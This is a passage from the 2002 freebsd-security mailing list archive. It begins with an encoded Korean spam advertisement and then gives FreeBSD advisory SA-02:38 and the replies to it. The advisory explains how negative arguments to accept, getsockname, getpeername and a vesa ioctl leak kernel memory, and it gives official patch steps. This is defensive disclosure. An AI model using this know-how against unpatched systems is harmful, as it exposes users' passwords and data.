ICAgICAgICAgICAgICAgICAgICAgICAgICA8VEJPRFk+DQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRE IHdpZHRoPTE0MT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249 bGVmdD48U1BBTiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3R5bGU9IkZP TlQtU0laRTogOXB0Ij48Rk9OVCBjb2xvcj0jY2Q0NDMzPjxCPiZuYnNwO7HivsYgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgILPruu23ub26PC9CPjwvRk9OVD48L1NQQU4+ PC9QPjwvVEQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0x NDE+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxQIGFsaWduPWxlZnQ+ICZu YnNwOzwvUD48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvRElWPjwvVEQ+PC9UUj4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8VEQgd2lkdGg9IjMyNCI+DQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIDxQIGFsaWduPWxlZnQ+PEJSPjxJTUcgaGVpZ2h0PSI3MiIgDQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcv cGFydG5lcjE1X2NhcmRfaW1nLmpwZyIgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIHdpZHRoPSIxMTMiIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBoZWlnaHQ9NyANCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8vaXllc2NhcmQuY29t L2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIGJvcmRlcj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPsbyu/0mbmJzcDu/ rMi4uvEguOnBpjxCUj48SU1HIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBo ZWlnaHQ9NyBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2J1XzAxLmdpZiIgd2lkdGg9 NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+IMb3wM7GrrOz us4ssPiw+rHdIMSrteWw4cGmILytuvG9uiZuYnNwOzxCUj48SU1HIA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBoZWlnaHQ9NyBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20v aW1nL2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgYm9yZGVyPTA+IMf2tOvBpMCvIKekILTnIDQwv/ggPEJSPjxJTUcgaGVpZ2h0PTcgDQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNv bS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICBib3JkZXI9MD4gv7XIrSC/ubjFIMDltOcgMiwwMDC/+CDH0sDOIDwvU1BBTj48L1A+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxESVYgYWxpZ249bGVmdD4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2Vs bFBhZGRpbmc9MCBib3JkZXI9MD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PFRCT0RZPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8VFI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0xNTIgaGVpZ2h0PTE3Pg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UD4mbmJzcDsmbmJzcDs8U1BBTiANCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3R5bGU9IkZPTlQtU0laRTogOXB0Ij48 Rk9OVCBjb2xvcj0jY2Q0NDMzPjxCPktUIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICC69MfDtvPA2jwvQj48L0ZPTlQ+PC9TUEFOPjwvUD48L1REPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTUyIGhlaWdodD0xNz4NCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD4gJm5ic3A7PC9QPjwvVEQ+ PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9ESVY+PC9URD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPFREIHdpZHRoPSIyOTEiPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8UCBhbGlnbj1sZWZ0Pjxicj48SU1HIGhlaWdodD0iNjgiIA0KICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2Nh cmRfaW1nXzExLmdpZiIgd2lkdGg9IjEwNiIgDQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBoZWlnaHQ9NyANCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9idV8w MS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJvcmRl cj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPrvnv+vH0SAwLjUluKYgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgILrSv+zAzL/0tb2x4jxCUj48SU1HIGhlaWdo dD03IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVz Y2FyZC5jb20vaW1nL2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgYm9yZGVyPTA+IMbyu/0mbmJzcDu/rMi4uvEguOnBpiA8QlI+PElNRyBo ZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8v aXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGJvcmRlcj0wPiCx3cC2vK268b26PEJSPjxJTUcgaGVpZ2h0PTcg DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJk LmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICBib3JkZXI9MD4gNb7vILmrt+EgurjH6CA8YnI+PGJyPjxicj48L1NQQU4+PC9Q Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWduPWxlZnQ+DQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxUQUJMRSBjZWxsU3BhY2luZz0wIGNl bGxQYWRkaW5nPTAgYm9yZGVyPTA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTQzPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8UCBhbGlnbj1sZWZ0PjxTUEFOIA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPjxGT05UIGNvbG9y PSNjZDQ0MzM+PEI+Jm5ic3A7u+e2+8DHIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICC81bDhxuyx4jwvQj48L0ZPTlQ+PC9TUEFOPjwvUD48L1REPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTQzPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8UCBhbGlnbj1sZWZ0PiAmbmJzcDs8L1A+PC9URD48L1RSPjwvVEJP RFk+PC9UQUJMRT48L0RJVj48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPiAgICAgICAgPC90 ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5NzQiPjxwIGFs aWduPSJsZWZ0Ij48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBjb2xvcj0iIzY2NjY2NiI+ Jm5ic3A7sc3Hz8DHIA0KICAgICAgICAgICAguN7Az8HWvNK0wiDApbytx87AuyDF68fYILz2 wf3H0SCwzcDMuOcsILHXv9y/oSC+7rawx9EgwaS6uLW1ILCusO0gDQogICAgICAgICAgICDA 1sH2IL7KwL3AuyC54Mj8tM+02S48YnI+ICZuYnNwO8DMIEUtbWFpbMC6ILnfvcXA/L/rwMy4 5ywgv/jEoSC+ysC4vccgDQogICAgICAgICAgICCw5r/sIL7Gt6Egw6K/oSC43sDPwda80rim IMDUt8LHz7+pIMHWvcO46SC1ziC5+CC02b3DILjewM/AzCANCiAgICAgICAgICAgILChwfYg Jm5ic3A7vsq1tbfPIMfPsNq9wLTPtNkuPGJyPiAmbmJzcDsmbmJzcDs8YnI+ICZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzwvZm9udD48 Rk9OVCBmYWNlPSKxvLiyIiBjb2xvcj0iIzY2NjY2NiIgc2l6ZT0yPrq7ILjewM/AuiDBpLq4 xeu9xbrOILHHsO0gu+fH17+hIMDHsMUgwaa48b+hIA0KPC9GT05UPjxGT05UIGZhY2U9IrG8 uLIiIGNvbG9yPSJyZWQiIHNpemU9IjIiPluxpLDtXTwvRk9OVD48Rk9OVCBmYWNlPSKxvLiy IiBjb2xvcj0iIzY2NjY2NiIgc2l6ZT0yPrbzsO0gx6W9w7XIILGksO0guN7Az8DUtM+02S48 L0ZPTlQ+PGZvbnQgY29sb3I9IiM2NjY2NjYiPjxCUj4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9mb250Pjxh IGhyZWY9Imh0dHA6Ly9peWVzY2FyZC5jb20vcmVzZnVsLmh0bWwiPjxmb250IGNvbG9yPSIj NjY2NjY2Ij48aW1nIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnV0dG9uXzMuZ2lm IiB3aWR0aD0iNzEiIGhlaWdodD0iMjUiIGJvcmRlcj0iMCI+PC9mb250PjwvYT48Zm9udCBj b2xvcj0iIzY2NjY2NiI+IA0KICAgICAgICAgICAgPC9mb250PjxGT05UIGNvbG9yPSIjNjY2 NjY2IiANCnNpemU9Mj659sawwLsgxay4r8fPvcO46SC89r3FsMW6zsOzuK6woSDAzLfnvu4g wf20z7TZLjwvRk9OVD48Zm9udCBjb2xvcj0iIzY2NjY2NiI+IDwvZm9udD48L3A+DQogICAg ICAgIDwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgICAgIDx0ZCB3aWR0aD0iOTc0 Ij4NCiAgICAgICAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGNvbG9yPSIjNjY2NjY2 Ij4mbmJzcDs8L2ZvbnQ+PEZPTlQgZmFjZT0isby4siIgY29sb3I9IiM2NjY2NjYiIHNpemU9 Mj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtJZiB5b3Ugd29uJ3QgcmVjZWl2ZSBhbnkgbW9y ZSBtYWlsIGFib3V0IHRoaXMgDQpzaXRlLCA8L0ZPTlQ+PGZvbnQgY29sb3I9IiM2NjY2NjYi PjxCUj4gJm5ic3A7Jm5ic3A7PC9mb250PjxhIGhyZWY9Imh0dHA6Ly9peWVzY2FyZC5jb20v cmVzZnVsLmh0bWwiPjxmb250IGNvbG9yPSIjNjY2NjY2Ij48aW1nIHNyYz0iaHR0cDovL2l5 ZXNjYXJkLmNvbS9pbWcvYnV0dG9uXzQuZ2lmIiB3aWR0aD0iNzEiIGhlaWdodD0iMjUiIGJv cmRlcj0iMCI+PC9mb250PjwvYT48Rk9OVCBjb2xvcj0iIzY2NjY2NiIgDQpzaXplPTI+cHJl c3MgYnV0dG9uIGFuZCBmaWxsIHlvdXIgZS1tYWlsIGFkZHJlc3MuIEFuZCB0aGVuIHdlIHdp bGwgbm90IHNlbmQgYW55IA0KbWFpbCB0byB5b3U8L0ZPTlQ+PC9wPg0KICAgICAgICA8L3Rk Pg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAgICA8dGQgd2lkdGg9Ijk3NCIgYmdjb2xv cj0iIzhCQjVFMiI+DQogICAgICAgICAgICA8cD4mbmJzcDs8Zm9udCBzaXplPSIyIiBmYWNl PSKxvLiyIiBjb2xvcj0iIzMzMzMzMyI+ursguN7Az8C6IMf2tOvEq7XlvLOw6LvnwMcgDQog ICAgICAgICAgICCws8DOIL+1vvcguN7Az8DUtM+02S4gJm5ic3A7uN7Az7nfvNvA2iC/rLb0 w7MgOiA8L2ZvbnQ+PGEgaHJlZj0ibWFpbHRvOmVuZXh0b3BAbHljb3MuY28ua3IiPjxmb250 IHNpemU9IjIiIGZhY2U9IrG8uLIiIGNvbG9yPSIjMzMzMzMzIj5lbmV4dG9wQGx5Y29zLmNv LmtyPC9mb250PjwvYT48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBjb2xvcj0iIzMzMzMz MyI+IA0KICAgICAgICAgICAgJm5ic3A7PC9mb250PjwvcD4NCiAgICAgICAgPC90ZD4NCiAg ICA8L3RyPg0KPC90YWJsZT4NCjxwPiZuYnNwOzwvcD4NCjwvYm9keT4NCg0KPC9odG1sPg0K ------=_NextPart_000_0197_01C0F44A.93A00C00-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 5:46:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F2DBF37B400 for ; Mon, 19 Aug 2002 05:46:26 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7513F43E72 for ; Mon, 19 Aug 2002 05:46:26 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id EF3902F; Mon, 19 Aug 2002 07:46:25 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g7JCkPfL024590; Mon, 19 Aug 2002 07:46:25 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g7JCkOv9024589; Mon, 19 Aug 2002 07:46:24 -0500 (CDT) Date: Mon, 19 Aug 2002 07:46:24 -0500 From: "Jacques A. Vidrine" To: peter.lai@uconn.edu Cc: D J Hawkey Jr , security at FreeBSD Subject: Re: Um, 4.6-RELEASE-p19? Message-ID: <20020819124624.GD61000@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , peter.lai@uconn.edu, D J Hawkey Jr , security at FreeBSD References: <20020818093013.A15126@sheol.localdomain> <20020818233039.GA7293@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020818233039.GA7293@cowbert.2y.net> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Aug 18, 2002 at 07:30:39PM -0400, Peter C. Lai wrote: > This is also what you get if you cvsup'd RELENG_4_6 (4.6.1-R-p11) > prior to the new release. > > I wonder how it fits in with the version bump to 4.6.2 though. > (does 4.6.2 == 4.6.1Rp11?) Pretty much, except for possible last-minute issues handled by the Release Engineering team. The next bump on the security branch will be 4.6.2-RELEASE-p1. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 5:56:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5913737B405; Mon, 19 Aug 2002 05:56:24 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6445643E70; Mon, 19 Aug 2002 05:56:23 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JCuNJU018800; Mon, 19 Aug 2002 05:56:23 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JCuNAd018797; Mon, 19 Aug 2002 05:56:23 -0700 (PDT) Date: Mon, 19 Aug 2002 05:56:23 -0700 (PDT) Message-Id: <200208191256.g7JCuNAd018797@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:38.signed-error Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:38.signed-error Security Advisory The FreeBSD Project Topic: Boundary checking errors involving signed integers Category: core Module: sys Announced: 2002-08-19 Credits: Silvio Cesare Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p10 Corrected: 2002-08-13 02:42:32 UTC (RELENG_4) 2002-08-13 12:12:36 UTC (RELENG_4_6) 2002-08-13 12:13:05 UTC (RELENG_4_5) 2002-08-13 12:13:49 UTC (RELENG_4_4) FreeBSD only: YES I. Background The issue described in this advisory affects the accept(2), getsockname(2), and getpeername(2) system calls, and the vesa(4) FBIO_GETPALETTE ioctl(2). II. Problem Description A few system calls were identified that contained assumptions that a given argument was always a positive integer, while in fact the argument was handled as a signed integer. As a result, the boundary checking code would fail if the system call were entered with a negative argument. III. Impact The affected system calls could be called with large negative arguments, causing the kernel to return a large portion of kernel memory. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way. For example, a terminal buffer might include a user-entered password. IV. Workaround None. V. Solution 1) Upgrade your vulnerable system to 4.6.2-RELEASE or 4.6-STABLE; or to any of the RELENG_4_6 (4.6.1-RELEASE-p11), RELENG_4_5 (4.5-RELEASE-p19), or RELENG_4_4 (4.4-RELEASE-p26) security branches dated after the respective correction dates. 2) To patch your present system: a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. The following patch has been tested to apply to all FreeBSD 4.x releases. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:38/signed-error.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:38/signed-error.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- src/sys/i386/isa/vesa.c RELENG_4 1.32.2.1 RELENG_4_6 1.32.10.1 RELENG_4_5 1.32.8.1 RELENG_4_4 1.32.6.1 src/sys/kern/uipc_syscalls.c RELENG_4 1.65.2.12 RELENG_4_6 1.65.2.9.6.1 RELENG_4_5 1.65.2.9.4.1 RELENG_4_4 1.65.2.9.2.1 src/sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.16 RELENG_4_5 1.44.2.20.2.20 RELENG_4_4 1.44.2.17.2.25 - ------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPWDpxFUuHi5z0oilAQHCWgP+PmomqbDBiBHKG6JWrx8Kz8M6gnrg4omw w/vH5uK2lHGL6ZGecwvhJOTbV4bKXt1C1dKoUyA7WH7l9nQi+1CrZwT/D5mkteU+ XEqtNfRhiaDokj/5I8MA0OM80+jryeAimxYDEi2vm315RIOMeR/sdP7m7H2vl9cZ V8rt/2zD2wc= =LpMd -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 6:22:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3DAA737B400 for ; Mon, 19 Aug 2002 06:22:18 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF3914404E for ; Mon, 19 Aug 2002 06:04:43 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 4C73C4D; Mon, 19 Aug 2002 08:04:33 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g7JD4XfL024809; Mon, 19 Aug 2002 08:04:33 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g7JD4WH4024808; Mon, 19 Aug 2002 08:04:32 -0500 (CDT) Date: Mon, 19 Aug 2002 08:04:32 -0500 From: "Jacques A. Vidrine" To: peter.lai@uconn.edu Cc: D J Hawkey Jr , security at FreeBSD Subject: Re: Um, 4.6-RELEASE-p19? Message-ID: <20020819130432.GA24752@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , peter.lai@uconn.edu, D J Hawkey Jr , security at FreeBSD References: <20020818093013.A15126@sheol.localdomain> <20020818233039.GA7293@cowbert.2y.net> <20020819124624.GD61000@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020819124624.GD61000@madman.nectar.cc> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Aug 19, 2002 at 07:46:24AM -0500, Jacques A. Vidrine wrote: > Pretty much, except for possible last-minute issues handled by the > Release Engineering team. The command cvs -q diff -u -j 'RELENG_4_6:Aug 13 12:15:00 2002' -r RELENG_4_6_2_RELEASE reveals exactly what. Specifically, some release notes, and a fix to the build infrastructure to help certain upgrade paths. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 9: 5: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DC91637B400 for ; Mon, 19 Aug 2002 09:05:05 -0700 (PDT) Received: from TMA-1.brad-x.com (static-b2-191.highspeed.eol.ca [64.56.236.191]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B5AA43E65 for ; Mon, 19 Aug 2002 09:05:05 -0700 (PDT) (envelope-from brad@brad-x.com) Received: from brad-x.com (Discovery.brad-x.com [201.64.15.21]) by TMA-1.brad-x.com (Postfix) with ESMTP id 2A6A222104A for ; Mon, 19 Aug 2002 12:05:24 -0400 (EDT) Message-ID: <3D611737.4010803@brad-x.com> Date: Mon, 19 Aug 2002 12:05:11 -0400 From: Brad Laue User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020806 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:38.signed-error References: <200208191256.g7JCuNAd018797@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-02:38.signed-error Security Advisory > The FreeBSD Project > > Topic: Boundary checking errors involving signed integers This might be an obtuse question, but I'm going to risk it and ask anyway. Given that accept(2) and getpeername(2) are vulnerable one would think this were remotely exploitable, but I'm not familiar enough to say this for certain. Is this a remotely exploitable issue, or only local? Brad -- // -- http://www.BRAD-X.com/ -- // To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 10: 2:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E320A37B400 for ; Mon, 19 Aug 2002 10:02:13 -0700 (PDT) Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7CEB543E70 for ; Mon, 19 Aug 2002 10:02:13 -0700 (PDT) (envelope-from bright@elvis.mu.org) Received: by elvis.mu.org (Postfix, from userid 1192) id 570DBAE1EE; Mon, 19 Aug 2002 10:02:13 -0700 (PDT) Date: Mon, 19 Aug 2002 10:02:13 -0700 From: Alfred Perlstein To: Brad Laue Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:38.signed-error Message-ID: <20020819170213.GE75574@elvis.mu.org> References: <200208191256.g7JCuNAd018797@freefall.freebsd.org> <3D611737.4010803@brad-x.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D611737.4010803@brad-x.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Brad Laue [020819 09:05] wrote: > FreeBSD Security Advisories wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > > > > ============================================================================= > > FreeBSD-SA-02:38.signed-error Security > Advisory > > The FreeBSD > Project > > > > Topic: Boundary checking errors involving signed integers > > This might be an obtuse question, but I'm going to risk it and ask anyway. > > Given that accept(2) and getpeername(2) are vulnerable one would think > this were remotely exploitable, but I'm not familiar enough to say this > for certain. > > Is this a remotely exploitable issue, or only local? Local only. It doesn't have to deal with how the kernel processes network data, only how the kernel processes user arguements. -- -Alfred Perlstein [alfred@freebsd.org] [#bsdcode/efnet/irc.prison.net] 'Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 10:41:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BEA2437B400 for ; Mon, 19 Aug 2002 10:41:08 -0700 (PDT) Received: from mailhost.unt.edu (mailhost.unt.edu [129.120.209.40]) by mx1.FreeBSD.org (Postfix) with ESMTP id 22C5B43E65 for ; Mon, 19 Aug 2002 10:41:08 -0700 (PDT) (envelope-from searle@unt.edu) Received: from unt.edu (slink.unt.edu [129.120.32.80]) by mailhost.unt.edu (8.11.4/8.11.4) with ESMTP id g7JHf4a15321 for ; Mon, 19 Aug 2002 12:41:05 -0500 (CDT) Message-ID: <3D612DB6.607@unt.edu> Date: Mon, 19 Aug 2002 12:41:10 -0500 From: Curry Searle Reply-To: searle@unt.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; 